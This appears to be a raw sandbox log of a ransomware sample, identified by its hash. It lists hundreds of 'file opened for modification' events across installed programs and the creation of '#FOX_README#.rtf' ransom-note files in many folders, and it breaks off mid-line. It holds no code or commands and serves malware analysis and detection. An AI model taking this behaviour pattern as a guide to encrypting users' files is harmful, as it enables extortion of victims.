f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\kinit.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\bn_IN\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\tr.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\uninstall.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-spi-actions.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\YST9 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.el_2.2.0.v201303151357.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\msjet.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\lua\intf\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\review_browser.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\mr.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\WidevineCdm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\TraceSelect.mpeg2 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\Setup.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.lucene.core_3.5.0.v20120725-1805.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Tongatapu f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_65_ffffff_1x400.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\pingsender.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Paramaribo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\defaults\pref\channel-prefs.js f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\plugins\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-windows.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\sql70.xsl f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\SystemV\HST10 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-api-visual_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_default_mru_on_win7.css f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Kamchatka f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Faroe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\notification_helper.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.updatechecker.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\EST5EDT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\about.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\VERSION.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.engine.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Metlakatla f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\custom.lua f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\ij.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\ext\meta-index f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.zh_CN_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\[email protected] f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkServerCP.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.application.ja_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunmscapi.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfont.properties.ja f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\form_responses.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\cy\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\San_Juan f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base_4.0.200.v20141007-2301.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\local_policy.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-options-keymap.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\config\Modules\org-netbeans-lib-profiler.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.felix.gogo.shell_0.10.0.v201212101605.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Mozilla Firefox\fonts\TwemojiMozilla.ttf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Installer\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Petersburg f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh89 f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\icons\date-span-16.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Matamoros f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\THIRDPARTYLICENSEREADME.txt f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\mobile.html f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Easter f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-api-annotations-common.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench_3.106.1.v20140827-1737.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\email_initiator.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\images\cursors\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\com-sun-tools-visualvm-modules-appui.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\gu.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\keytool.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jdwpTransport.h f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\com-sun-tools-visualvm-profiler.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\management.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\plugins.dat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Budapest f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.ibm.icu_52.1.0.v201404241930.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.views.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Fortaleza f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Pontianak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-icons_228ef1_256x240.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.core_5.5.0.165303\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Kiritimati f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Argentina\Cordoba f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_highlight-soft_100_eeeeee_1x100.png f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\META-INF\MANIFEST.MF f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Jamaica f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.bidi_0.10.0.v20130327-1442.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Matamoros f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Nairobi f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\accessibility.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_ja.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Vladivostok f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\ssvagent.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-execution.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\locale\jfluid-server_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\3difr.x3d f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Port_Moresby f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Guadalcanal f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\core\org-openide-filesystems.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\feature.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-masterfs-nio2_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\modules\host.luac f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Chihuahua f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\cmm\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.garbagecollector_1.0.200.v20131115-1210.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.operations.nl_ja_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.attach_5.5.0.165303.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\84.0.4147.89\84.0.4147.89_chrome_installer.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.nl_zh_4.4.0.v20140623020002.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Dublin f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jre7\lib\images\cursors\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\84.0.4147.89\Locales\it.pak f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\security\US_export_policy.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench3_0.12.0.v20140227-2118.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOnNotificationInAcrobat.gif f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Grand_Turk f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\derby_common.bat f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Maceio f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\plugin.properties f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-modules-sendopts.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File created C:\Program Files\VideoLAN\VLC\skins\fonts\#FOX_README#.rtf f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Edmonton f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core-ui_zh_CN.jar f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\Java\jre7\bin\java-rmi.exe f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\requests\browse.xml f92a631f2f12e7ba8c9d031a31b5f4c1158e140665c5d081db55f67b11fb4a14.exe File opened for modification C:\Program 